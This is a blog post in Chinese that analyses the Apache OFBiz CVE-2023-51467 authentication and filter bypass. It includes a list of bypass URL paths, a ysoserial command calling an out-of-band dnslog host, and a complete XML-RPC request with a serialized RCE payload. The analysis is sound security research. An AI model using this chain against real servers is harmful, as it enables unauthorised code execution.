Loading

Apache Ofbiz CVE-2023-51467 漏洞分析

Apache Ofbiz CVE-2023-51467 漏洞分析

漏洞影响范围

  • Apache OFBiz < 18.12.10

环境搭建

启动docker环境

vulhub-master/ofbiz/CVE-2023-51467

克隆仓库,转到指定commit,用idea进行远程调试

git clone https://github.com/apache/ofbiz-framework.git
cd ofbiz-framework
git checkout 7935a14627a86325440516ac6b892a5f9d635e4d

漏洞分析

CVE-2023-51467 是对 CVE-2020-9496 漏洞的进一步绕过。在修补 CVE-2020-9496 后,Apache OFBiz 官方引入了关键性补丁,包括:

  • 对 /control/xmlrpc 接口的传入数据添加过滤器。
  • 对 /control/xmlrpc 接口实施认证和授权。

过滤器绕过

在补丁处 org.apache.ofbiz.base.util.CacheFilter#doFilter 的两个判断进行了数据过滤

image.png
第一个if语句判断当前的path是不是等于 /control/xmlrpc ,第二个if 语句判断body中是否包含 </serializable

利用矩阵参数(Matrix Parameters)的写法,可以绕过第一个if对于path的判断,从而直接跳过这个filter。

以下是一个完整的url格式示例,其中的Matrix Parameters就是矩阵参数

image.png
所以,写成/webtools/control/xmlrpc;/或者/webtools/control/xmlrpc/;/都可以进行绕过。实际上,我测试的以下几个都可以进行绕过

加斜杠:
/webtools/control/xmlrpc/
/webtools/control/xmlrpc//
矩阵参数写法:
/webtools/control/xmlrpc;/
/webtools/control/xmlrpc/;/
/webtools/control/xmlrpc/;o/
/webtools/control/xmlrpc/;o=1/
/webtools/control/xmlrpc;o/
/webtools/control/xmlrpc;o=1/

未授权访问

访问 /control/xmlrpc 接口需要认证

image.png

其认证逻辑在 org.apache.ofbiz.webapp.control.LoginWorker#checkLogin 中,查找380行的 return 处,返回了 success ,即为认证成功

image.png

需要代码运行到此片段,需要绕过下面两个if条件语句
一个为343行的条件语句

image.png

另一个为374行的条件语句

image.png

接下来对这两个条件语句的逻辑进行跟踪解析
转到343行的条件语句,

image.png
它检查了几种情况:

  1. 如果用户名(username)为null;
  2. 或者密码(password)为null并且令牌(token)也为null;
  3. 或者调用login方法返回的结果为字符串"error"。

如果以上任何一个条件成立,整个条件语句将会返回true,否则返回false。
其中的username、password、token三个参数都是从请求中获取

image.png

来到343行的判断,第一个语句username == null
如果 username = ""(即用户名为空字符串),那么 username == null 的判断结果将会是 false。因为在Java中,空字符串("")和 null 是有区别的。

  • null 表示该变量没有引用任何对象。
  • 空字符串("")表示该变量引用了一个内容为空的字符串对象。

同理第二个判断(password == null && token == null),设置password = ""为空,判断结果也会是 false
进入第三个语句"error".equals(login(request, response)),其login(request, response)不为"error"时,则可以绕过此条条件语句。
查看login()方法,在其444-448行处,返回了login()方法值。当参数requirePasswordChange等于Y时,则把Y作为返回值, 否则返回 error

image.png

我们只需要设置requirePasswordChange=Y则可以绕过权限校验。结合以上分析,完整的构造url为:
?USERNAME=&PASSWORD=&requirePasswordChange=Y

构造出整个利用url:
/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y

漏洞利用

修改之前 CVE-2020-9496 的 POC 代码即可。漏洞利用的 URL 为 https://localhost:8443/webtools/control/xmlrpc。在 OFBiz 中,存在 CommonsBeanutils1 利用链,可以生成反序列化数据并进行 base64 编码:

java -jar ysoserial-0.0.8-SNAPSHOT-all.jar  CommonsBeanutils1   "curl http://RCE.bgkjco.dnslog.cn" | base64 |  tr -d '\n'

以下是发送数据包,反序列化数据写在 <serializable> 标签里

POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Connection: close
Content-Type: application/xml
Content-Length: 4117

<?xml version="1.0"?>
<methodCall>
  <methodName>22</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>22</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAAgzK/rq+AAAAMwAcAQAaeXNvc2VyaWFsL1B3bmVyMzA3MzUwNTAzMzIHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAFVB3bmVyMzA3MzUwNTAzMzIuamF2YQEACDxjbGluaXQ+AQADKClWAQAEQ29kZQEAEWphdmEvbGFuZy9SdW50aW1lBwAKAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADAANCgALAA4BADhjdXJsIGh0dHA6Ly85anRweHdrdWNpenRkem5pNzdrcnN4ZHF6aDU4dHlobi5vYXN0aWZ5LmNvbQgAEAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMABIAEwoACwAUAQANU3RhY2tNYXBUYWJsZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHABcBAAY8aW5pdD4MABkACAoAGAAaACEAAgAYAAAAAAACAAgABwAIAAEACQAAACQAAwACAAAAD6cAAwFMuAAPEhG2ABVXsQAAAAEAFgAAAAMAAQMAAQAZAAgAAQAJAAAAEQABAAEAAAAFKrcAG7EAAAAAAAEABQAAAAIABnVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

修复

最新发行版18.12.10中,对于CVE-2023-49070的修复方式是直接移除了XML-RPC相关的逻辑。

posted @ 2024-02-13 23:00  Atomovo  阅读(182)  评论(0编辑  收藏  举报